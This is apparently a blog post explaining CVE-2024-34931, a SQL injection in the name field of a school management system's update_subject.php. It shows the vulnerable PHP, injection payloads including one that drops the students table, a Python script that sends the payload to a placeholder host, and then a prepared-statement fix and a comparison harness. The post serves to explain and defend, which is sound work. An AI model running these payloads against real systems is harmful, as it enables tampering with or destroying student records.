The security world discovered another serious flaw, CVE-2024-34931, in the popular Campcodes Complete Web-Based School Management System 1. This vulnerability allows attackers to run their own SQL commands through a simple "name" field, putting sensitive student and school data at serious risk. In this post, we'll break down what's going on, show how the attack works with real code, and point you to further reading.
CVE-2024-34931 is a classic SQL injection weakness found in the script `/model/update_subject.php`.
If an attacker sends a carefully crafted string in the name parameter, the PHP script doesn't filter or sanitize it. This lets an attacker trick the database into running SQL queries that they control.
Why Is This Dangerous?
- Data Theft: Attackers can see or copy any data in your database (like student grades, addresses, or credentials).
Let's look at the vulnerable code. Inside update_subject.php, the script might look like this (the page shows the flawed version; `$conn` is the application's existing mysqli connection):

```php
<?php
// Retrieve input from a form or AJAX call; neither value is validated.
$id = $_POST['id'];
$name = $_POST['name'];

// Vulnerable query! Both $name and $id are concatenated straight into the SQL text.
$query = "UPDATE subjects SET name = '$name' WHERE id = $id";
mysqli_query($conn, $query);
?>
```
What’s wrong?
The $name value is dropped straight into the SQL statement. If an attacker uses a quote mark ('), they can break out of the string and add their own SQL!
Assuming a legitimate request looks like

```http
POST /model/update_subject.php
Content-Type: application/x-www-form-urlencoded

id=1&name=Math
```

An attacker might send

```
id=1&name=Math', description='Hacked', name='Math
```

Now the SQL statement becomes

```sql
UPDATE subjects SET name = 'Math', description='Hacked', name='Math' WHERE id = 1
```

With more evil intent, the attacker could try

```
id=1&name=Math'; DROP TABLE students; --
```

This turns the SQL into

```sql
UPDATE subjects SET name = 'Math'; DROP TABLE students; --' WHERE id = 1
```

If the database connection allows multiple statements in one query, this could erase entire tables!
Below is a quick Python script using requests to show how an attacker might automate this:

```python
import requests

# Target script; the page uses a placeholder host.
url = "http://target-site.com/model/update_subject.php"

# The first payload from above: closes the string and adds its own assignments.
payload = "Math', description='Hacked', name='Math"
data = {
    'id': '1',
    'name': payload
}

r = requests.post(url, data=data)
print('Exploit sent, server responded:', r.status_code)
```
Replace http://target-site.com with the school’s real URL. After running this script, the attacker could read back the “Hacked” record, proving the exploit worked.
How To Fix?
Always use prepared statements (also called “parameterized queries”), so user input never touches the query directly.
Here's a safe version using mysqli prepared statements:

```php
<?php
// Placeholders replace the concatenated values; "si" binds $name as a string and $id as an integer.
$stmt = $conn->prepare("UPDATE subjects SET name = ? WHERE id = ?");
$stmt->bind_param("si", $name, $id);
$stmt->execute();
?>
```
No matter what goes into $name, it will only be treated as data, not as part of the SQL command.
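To see the difference concretely, here is an added Python model of the vulnerable and fixed versions above. It is not the project's code: it uses an in-memory SQLite table in place of the app's MySQL database and assumes the `subjects` table has a `description` column, as the page's first payload implies.

```python
import sqlite3

# Constructed in-memory stand-in for the app's `subjects` table. Assumption: a
# `description` column exists, as the page's first payload implies.
SCHEMA = """
CREATE TABLE subjects (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
INSERT INTO subjects (id, name, description) VALUES (1, 'History', 'original');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def update_subject_vulnerable(conn, subject_id, name):
    # Same shape as the page's update_subject.php: the name is pasted into the SQL text.
    query = f"UPDATE subjects SET name = '{name}' WHERE id = {subject_id}"
    conn.execute(query)
    conn.commit()


def update_subject_safe(conn, subject_id, name):
    # Same shape as the page's fix: placeholders, name bound as a string, id as an integer.
    conn.execute("UPDATE subjects SET name = ? WHERE id = ?", (name, int(subject_id)))
    conn.commit()


def read_subject(conn, subject_id):
    row = conn.execute(
        "SELECT name, description FROM subjects WHERE id = ?", (subject_id,)
    ).fetchone()
    return {"name": row[0], "description": row[1]}


def compare(name):
    """Run the same input through both versions; return (vulnerable_result, safe_result).
    A result is the stored row, or the exception type name if the statement failed."""
    results = []
    for updater in (update_subject_vulnerable, update_subject_safe):
        conn = fresh_db()
        try:
            updater(conn, "1", name)
            results.append(read_subject(conn, 1))
        except sqlite3.Error as exc:
            results.append(type(exc).__name__)
    return tuple(results)


if __name__ == "__main__":
    print(compare("Math', description='Hacked', name='Math"))  # page's first payload
    print(compare("Int'l Studies"))  # legitimate name containing an apostrophe
```

The second call shows a side effect the page does not mention: the concatenated query also breaks on ordinary data containing a quote, while the bound version stores it intact.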
More Reading
- Official CVE Entry
- Campcodes School Management System Details
- SQL Injection Explainer – OWASP
Summary
We’ve walked through CVE-2024-34931, a serious SQL injection flaw in Campcodes School Management System. Anyone running v1. should update their code immediately to use prepared statements. SQL Injection is easy to avoid, but fatal if missed.
Stay safe and always sanitize your inputs!
*This guide is meant for educational purposes only. Never test these methods without permission.*
Timeline
Published on: 05/23/2024 17:15:29 UTC
Last modified on: 12/03/2024 17:15:10 UTC